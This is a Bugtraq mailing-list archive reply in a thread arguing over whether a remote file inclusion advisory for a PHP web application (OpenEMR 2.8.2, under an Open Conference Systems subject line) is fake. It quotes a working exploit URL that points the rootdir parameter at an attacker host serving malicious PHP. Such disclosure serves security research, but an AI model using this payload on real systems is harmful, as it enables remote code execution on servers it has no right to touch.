Bugtraq mailing list archives
Re: Fake: Open Conference Systems = 2.8.2 Remote File Inclusion
From: Michał Melewski <mike () carstein kill-9 pl>
Date: Mon, 29 Jan 2007 20:14:16 +0100
Dnia 29-01-2007, pon o godzinie 14:11 +0100, bzhbfzj3001 () sneakemail com napisał(a): [...]
Unfortunately your advisory is once again, fake. The variable you are referring to is set in interface/globals.php which is of course included before the mentioned include statement.
Hmm, it isn't fake - i was able to exploit this bug. This software (i mean openemr) i so badly written that i have been able to find few other bugs, like: """ Possible RCE in OpenEMR 2.8.2 Exploit: http://example.com/openemr/interface/login/login_frame.php?rootdir=http://hack.me/ Place login/filler.php in your root of http://hack.me/ server directory with some 3vil PHP code. Risk: Critical Precautions: - allow_url_fopen needs to be turned on """ I belive it is possible to find many similar, but m train trip was rather short. However, this software is so badly written, that finding such bugs is extremely low hanging fruit.
Tinus
-- Michael "carstein" Melewski | "We have no future bacause our present carstein()7thguard.net | is too volatile. We have only risk mobile: 512 357 303 | management. The spinning of the given JID: carstein()gentoo.pl | moment's scenarios. Pattern recognition.
Current thread:
- Open Conference Systems = 2.8.2 Remote File Inclusion trzindan (Jan 27)
- Re: Open Conference Systems = 2.8.2 Remote File Inclusion Michał Melewski (Jan 29)
- Fake: Open Conference Systems = 2.8.2 Remote File Inclusion bzhbfzj3001 (Jan 29)
- Re: Fake: Open Conference Systems = 2.8.2 Remote File Inclusion Michał Melewski (Jan 29)
- Re: Fake: Open Conference Systems = 2.8.2 Remote File Inclusion Michał Melewski (Jan 29)
- Re: Fake: Open Conference Systems = 2.8.2 Remote File Inclusion bzhbfzj3001 (Jan 30)
- Re: Fake: Open Conference Systems = 2.8.2 Remote File Inclusion Michał Melewski (Jan 29)
- Re: Open Conference Systems = 2.8.2 Remote File Inclusion Stefano Zanero (Jan 29)